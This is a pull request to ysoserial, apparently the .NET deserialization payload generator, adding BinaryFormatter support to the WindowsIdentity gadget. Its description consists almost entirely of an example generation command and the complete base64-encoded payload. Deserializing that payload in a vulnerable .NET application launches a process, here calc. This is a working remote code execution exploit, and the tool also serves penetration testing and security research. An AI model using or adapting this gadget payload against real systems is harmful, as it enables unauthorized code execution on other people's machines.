### PR TITLE
Added BinaryFormatter support to the WindowsIdentity gadget

### DIFF
--- a/README.md
+++ b/README.md
@@ -47,6 +47,7 @@ Available formatters:
                         LosFormatter
         WindowsIdentity (WindowsIdentity Gadget by Levi Broderick)
                 Formatters:
+                        BinaryFormatter
                         Json.Net
                         DataContractSerializer
 


### PR DESCRIPTION
## Example
```
$ ./ysoserial.exe -o base64 -g WindowsIdentity -f BinaryFormatter -c calc -t
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAvU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmJvb3RzdHJhcENvbnRleHQBBgIAAACsF0FBRUFBQUQvLy8vL0FRQUFBQUFBQUFBTUFnQUFBRWxUZVhOMFpXMHNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1QlFFQUFBQ0VBVk41YzNSbGJTNURiMnhzWldOMGFXOXVjeTVIWlc1bGNtbGpMbE52Y25SbFpGTmxkR0F4VzF0VGVYTjBaVzB1VTNSeWFXNW5MQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZFhRUUFBQUFGUTI5MWJuUUlRMjl0Y0dGeVpYSUhWbVZ5YzJsdmJnVkpkR1Z0Y3dBREFBWUlqUUZUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11UjJWdVpYSnBZeTVEYjIxd1lYSnBjMjl1UTI5dGNHRnlaWEpnTVZ0YlUzbHpkR1Z0TGxOMGNtbHVaeXdnYlhOamIzSnNhV0lzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNVhWMElBZ0FBQUFJQUFBQUpBd0FBQUFJQUFBQUpCQUFBQUFRREFBQUFqUUZUZVhOMFpXMHVRMjlzYkdWamRHbHZibk11UjJWdVpYSnBZeTVEYjIxd1lYSnBjMjl1UTI5dGNHRnlaWEpnTVZ0YlUzbHpkR1Z0TGxOMGNtbHVaeXdnYlhOamIzSnNhV0lzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNVhWMEJBQUFBQzE5amIyMXdZWEpwYzI5dUF5SlRlWE4wWlcwdVJHVnNaV2RoZEdWVFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeUNRVUFBQUFSQkFBQUFBSUFBQUFHQmdBQUFBY3ZZeUJqWVd4akJnY0FBQUFEWTIxa0JBVUFBQUFpVTNsemRHVnRMa1JsYkdWbllYUmxVMlZ5YVdGc2FYcGhkR2x2YmtodmJHUmxjZ01BQUFBSVJHVnNaV2RoZEdVSGJXVjBhRzlrTUFkdFpYUm9iMlF4QXdNRE1GTjVjM1JsYlM1RVpXeGxaMkYwWlZObGNtbGhiR2w2WVhScGIyNUliMnhrWlhJclJHVnNaV2RoZEdWRmJuUnllUzlUZVhOMFpXMHVVbVZtYkdWamRHbHZiaTVOWlcxaVpYSkpibVp2VTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2k5VGVYTjBaVzB1VW1WbWJHVmpkR2x2Ymk1TlpXMWlaWEpKYm1adlUyVnlhV0ZzYVhwaGRHbHZia2h2YkdSbGNna0lBQUFBQ1FrQUFBQUpDZ0FBQUFRSUFBQUFNRk41YzNSbGJTNUVaV3hsWjJGMFpWTmxjbWxoYkdsNllYUnBiMjVJYjJ4a1pYSXJSR1ZzWldkaGRHVkZiblJ5ZVFjQUFBQUVkSGx3WlFoaGMzTmxiV0pzZVFaMFlYSm5aWFFTZEdGeVoyVjBWSGx3WlVGemMyVnRZbXg1RG5SaGNtZGxkRlI1Y0dWT1lXMWxDbTFsZEdodlpFNWhiV1VOWkdWc1pXZGhkR1ZGYm5SeWVRRUJBZ0VCQVFNd1UzbHpkR1Z0TGtSbGJHVm5ZWFJsVTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2l0RVpXeGxaMkYwWlVWdWRISjVCZ3NBQUFDd0FsTjVjM1JsYlM1R2RXNWpZRE5iVzFONWMzUmxiUzVUZEhKcGJtY3NJRzF6WTI5eWJHbGlMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1Ywc1cxTjVjM1JsYlM1VGRISnBibWNzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMHNXMU41YzNSbGJTNUVhV0ZuYm05emRHbGpjeTVRY205alpYTnpMQ0JUZVhOMFpXMHNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1WFYwR0RBQUFBRXR0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RrS0JnMEFBQUJKVTNsemRHVnRMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1FZT0FBQUFHbE41YzNSbGJTNUVhV0ZuYm05emRHbGpjeTVRY205alpYTnpCZzhBQUFBRlUzUmhjblFKRUFBQUFBUUpBQUFBTDFONWMzUmxiUzVTWldac1pXTjBhVzl1TGsxbGJXSmxja2x1Wm05VFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeUJ3QUFBQVJPWVcxbERFRnpjMlZ0WW14NVRtRnRaUWxEYkdGemMwNWhiV1VKVTJsbmJtRjBkWEpsQ2xOcFoyNWhkSFZ5WlRJS1RXVnRZbVZ5Vkhsd1pSQkhaVzVsY21salFYSm5kVzFsYm5SekFRRUJBUUVBQXdnTlUzbHpkR1Z0TGxSNWNHVmJYUWtQQUFBQUNRMEFBQUFKRGdBQUFBWVVBQUFBUGxONWMzUmxiUzVFYVdGbmJtOXpkR2xqY3k1UWNtOWpaWE56SUZOMFlYSjBLRk41YzNSbGJTNVRkSEpwYm1jc0lGTjVjM1JsYlM1VGRISnBibWNwQmhVQUFBQStVM2x6ZEdWdExrUnBZV2R1YjNOMGFXTnpMbEJ5YjJObGMzTWdVM1JoY25Rb1UzbHpkR1Z0TGxOMGNtbHVaeXdnVTNsemRHVnRMbE4wY21sdVp5a0lBQUFBQ2dFS0FBQUFDUUFBQUFZV0FBQUFCME52YlhCaGNtVUpEQUFBQUFZWUFBQUFEVk41YzNSbGJTNVRkSEpwYm1jR0dRQUFBQ3RKYm5Rek1pQkRiMjF3WVhKbEtGTjVjM1JsYlM1VGRISnBibWNzSUZONWMzUmxiUzVUZEhKcGJtY3BCaG9BQUFBeVUzbHpkR1Z0TGtsdWRETXlJRU52YlhCaGNtVW9VM2x6ZEdWdExsTjBjbWx1Wnl3Z1UzbHpkR1Z0TGxOMGNtbHVaeWtJQUFBQUNnRVFBQUFBQ0FBQUFBWWJBQUFBY1ZONWMzUmxiUzVEYjIxd1lYSnBjMjl1WURGYlcxTjVjM1JsYlM1VGRISnBibWNzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMWRDUXdBQUFBS0NRd0FBQUFKR0FBQUFBa1dBQUFBQ2dzPQs=
```